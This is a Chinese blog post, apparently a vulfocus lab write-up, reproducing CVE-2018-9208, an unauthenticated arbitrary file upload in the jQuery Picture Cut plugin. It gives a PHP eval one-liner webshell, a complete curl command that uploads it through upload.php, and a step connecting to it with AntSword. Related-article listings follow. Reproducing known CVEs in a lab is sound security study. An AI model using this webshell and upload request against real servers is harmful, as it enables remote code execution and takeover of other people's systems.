jquery-picture-cut 任意文件上传(CVE-2018-9208)

已于 2022-11-02 17:35:40 修改
阅读量827 收藏 1
点赞数 1
分类专栏: vulfocus 文章标签: jquery 安全 网络安全 web安全 系统安全
于 2022-10-31 16:19:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42575797/article/details/127617886
版权

jquery-picture-cut 任意文件上传(CVE-2018-9208)

漏洞描述

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

漏洞影响

jQuery Picture Cut <= v1.1

在这里插入图片描述
注意:vulfocus靶场中的网站安装路径为jquery-picture-cut/src/php/upload.php
在这里插入图片描述

漏洞复现

准备一个一句话木马,shell.php

<?php @eval($_POST['cmd']);?>

使用curl在当前一句话木马目录中上传webshell,虽然显示了一些错误,但是实际是成功上传了

curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://x.x.x.x/jquery-picture-cut/src/php/upload.php

在这里插入图片描述
使用蚁剑连接webshell,密码为cmd

http://x.x.x.x/shell.php

在这里插入图片描述

flag-{bmh7616f868-bc3a-4f28-9407-ef4c15a4eb3e}

在这里插入图片描述

Gh0stX
关注
专栏目录
【漏洞复现】 jquery 文件上传CVE-2018-9207|CVE-2018-9208
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-21 828
core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
jquery-picture-cut 任意文件上传CVE-2018-9208
weixin_51559599的博客
10-27 302
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
jquery 图片剪切
07-31
jquery 图片剪切 后台是jav
jquery-picture-cut 任意文件上传(CVE-2018-9208)
最新发布
m0_65150886的博客
01-02 485
picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。2.准备一句话木马文件 1.php。
jQuery图片剪切插件PictureCut.zip
07-18
Picture cut 是一个 jQuery 插件,通过友好的方式实现漂亮的图像上传、浏览和剪切操作。 特性: Ajax 上传 图像大小调整 拖放图片实现上传 图像尺寸处理 图像裁剪 支持浏览器: Google Chrome Mozilla Firefox Apple Safari Opera Internet Explorer 7 截图: 标签:Picture
jquery 图片上传
hugejihu9的专栏
11-13 267
文章来自:源码在线https://www.shengli.me/jquery/218.html   代码:    
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
JQuery 及插件实现图片剪切分割上传服务器
01-12
最近做一个项目的图像上传功能,这个功能就是类似与大型网站的图像上传功能。上传切割主要是相对于起点的四个偏移量,left、top、width、height值,然后在后台进行切割显示给会员。
php+html+jquery实现图片裁剪上传
11-08
php+html+jquery实现图片裁剪上传
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
jquery实现截取pc图片_jquery 上传图片自由截取
weixin_39625162的博客
12-21 317
为了使用户能自定义个人头像,需要提供一个对上传图片的截图功能,当前很多网站特别是SNS类网站都提供这样的功能,非常实用。本文主要是利用jQuery的imgAreaSelect插件实现。首先引入三个文件:">前段主要代码:初始化所选择截取的图片$('#photo').imgAreaSelect({aspectRatio: '1:1',handles: true, fadeSpeed: 200, on...
js php裁剪代码,jquery实现自定义图片裁剪功能代码分享
weixin_39624864的博客
03-28 274
图片自定义裁剪如何实现?本文主要介绍了jquery实现自定义图片裁剪功能,代码超级简单,易修改。下面跟着小编一起来看下吧,希望能帮助到大家。1.自定义宽高效果1.html 代码 index.htmlTitle2.添加插件代码(function ($) {$.fn.photoCrop=function (option) {var opt={img:'',fixedScale:9/5,isHead:...
CVE-2018-9206
yuanfengfengyuan的博客
06-05 469
MSG Blueimp jQuery-File-Upload是一款支持多种语言的文件上传工具,它包括文件选择、文件拖放、进度条显示和图像预览等功能。 Blueimp jQuery-File-Upload 9.22.0及之前版本中存在任意文件上传漏洞。远程攻击者可利用该漏洞执行代码。 POC POC一:https://github.com/lcashdol/Exploits/tree/master/...
jquery 文件上传漏洞(CVE-2018-9207)
ak.Gh0st的博客
10-31 745
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
漏洞复现-jquery-picture-cut 任意文件上传_(CVE-2018-9208
qq_58683895的博客
10-27 571
picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置。volfucs靶场复现。
wordpress任意文件上传(cve-2019-15866)
09-04
然而,在2019年的漏洞披露中发现了一个名为CVE-2019-15866的重要漏洞,该漏洞使得攻击者可以进行任意文件上传。 该漏洞的利用方式是通过特制的恶意请求,将恶意文件上传到WordPress网站的服务器上。攻击者可以上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Gh0stX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值